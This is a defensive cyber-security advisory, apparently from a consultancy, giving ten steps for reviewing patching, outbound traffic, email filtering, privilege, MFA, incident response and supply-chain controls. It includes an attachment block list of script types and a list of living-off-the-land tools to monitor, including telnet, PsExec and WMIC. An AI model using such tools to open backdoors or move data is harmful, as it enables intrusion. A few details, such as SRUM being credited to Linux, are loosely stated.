Reviewing cyber-defences at a time of intensified threat

The NCSC has called for organisations to bolster their online defences, due to recent events on the world stage. We have compiled a list of our guidance and advice to help your organisation review its Cyber Security Controls and threat detection measures.

1. Low Hanging Fruit – remove your vulnerabilities.
• Ensure your critical assets and published services are sufficiently patched to remove remotely exploitable vulnerabilities.
• Re-evaluate the Risk Business Case to use any externally facing services. Are they really needed? If not turn them off.
• Complete a vulnerability assessment across all your exposed systems to better understand potential vulnerabilities.
• Maintain a consistent patch management process to ensure all assets are routinely patched and or upgraded to remove known vulnerabilities.

What are my critical assets? Critical assets are resources essential to maintaining operations and achieving your organisation’s mission. They could be hardware, software, data, patents/copyrights, research, processes, or services.

2. Watch your outbound traffic – is anyone calling home?
• If you have the capacity, watch your outbound traffic, particularly from assets that will respond to external requests, such as file transfer, mail and web servers.
• Remember: Servers hosting external services should be confined to a DMZ to protect your other organisational assets from potential compromise and lateral movement.
• Review your firewall exceptions and justify current rules. Remove anything using unrefined or insecure protocols.
3. Inbound Communication and controls – the bare minimum.
• Ensure your email system and filtering system is not delivering suspect messages to mailboxes. By default, messages are often sent to the Junk Mailbox folder rather than being explicitly blocked.
• Ensure your email DNS records are appropriately configured to prevent spoofing.
• Ensure commonly exploited attachments are blocked, this included macro enabled office documents, compressed files, hta, scripts such as Batch, VBScript, PowerShell, Python and bash etc.
  • Your allowed attachments list should be very small:
  • PDF / DOC(X) / XLS(X) / PPT(X) 
• On the flip side, ensure your mail system will not allow critical files to be sent externally, this may include log files, certificates and files containing financial or personal information.
• Review other collaboration tools to ensure public communication is restricted. This may be a way for malicious actors to circumvent some of your well positioned controls.
4. Baseline your environment – understand what is normal.
• It is crucial to understand what is normal communication within your environment. Minimising noisy outbound connections will help you better understand potentially malicious or undocumented communication.
• Approve and control your applications. Restricting the ability for users to launch/install unapproved applications and scripts will help restrict some malicious applications from launching.
• Windows and Enterprise Linux has built in application control/auditing features that can help you achieve this, such as AppLocker and SRUM. This may not be achievable for everyone. However understanding your application usage will give you a boost in identifying anything potentially rogue/malicious.
• If you don’t have an EDR (Endpoint Detection Response) platform consider implementing a system resource monitor to enable you to review long term system usage and baseline applications.
5. Monitor native Windows/Linux system tools – living off the land.
• If a system is compromised by an advanced threat actor, they are unlikely to start dumping files and launching applications. They will attempt to “live of the land” and use existing system tools to open backdoors or move data.
• By default EDR and SIEM tools are unlikely to identify threats from built in system resources unless detections have been specifically crafted.
• Ensure you monitor usage of common system management tools like: PowerShell, batch, WMIC, telnet, PS exec, hyper V/virtual box/VMware. Unless you are an administrator you are unlikely to be using these tools.
6. Roles and Responsibility – least privilege.
• Ensure your users are only assigned rights to access what they need to perform their roles. If compromised, an over privileged user can allow a malicious attacker a simple way to access your organisations most critical and sensitive systems.
• Provide administrators with super user accounts to limit usage time of privileged accounts to the bare minimum.
• Consider implementing a privileged access management tool to minimise risk by controlling access to credentials, understanding usage and limiting usage to defined periods.
• Super user accounts should not have access to browse the web or email to limit potential compromise opportunities.
7. Additional authentication and sign in.
• Protect your user accounts with additional authentication. Multi-factor authentication is now widely supported by all SaaS/IaaS. It should be enabled across all your Microsoft 365 users.
• If MFA is not practical consider using alternative protections such as conditional access or advanced sign in risk analysis. However these features usually come at a cost.
• Review your user sign in locations and impossible travel events.
8. Plan for the worst – you need an incident response plan.
• Once you have reviewed your critical assets and potential threats, you should build an Incident Response Plan around them.
• Your Incident Response Plan must be able to isolate incidents quickly, all involved parties must understand what is expected of and responses must be tested.
• If you have sensitive data in your environment consider your obligations, do you have the skills and resource on hand to collect forensic data.
9. User Awareness and Threat Intelligence – understanding potential threats.
• Ensure your staff are aware of potential threats via phishing. These are getting harder to spot but they are all too common. The NCSC have recently reported that 91% of UK organisations have been the subject of a successful attack.
• Subscribe to threat intelligence feeds to understand the potential threats that are targeting organisation in your country. This can allow you to pre-emptively implement mitigations and resolve vulnerabilities/zero-days before they are targeted.
10. A compromise may not always be direct – review your supply chain

Ensure due diligence is completed within your supply chain by making sure they have:

• A mature and resourced cyber security program.
• A clear security assurance and risk management processes.
• Defined product support lifecycles for all hardware, software and services.
• The ability to support your data protection requirements and disaster recovery processes.
• A respectable background.

If you need any further guidance or require a security assessment, get in touch.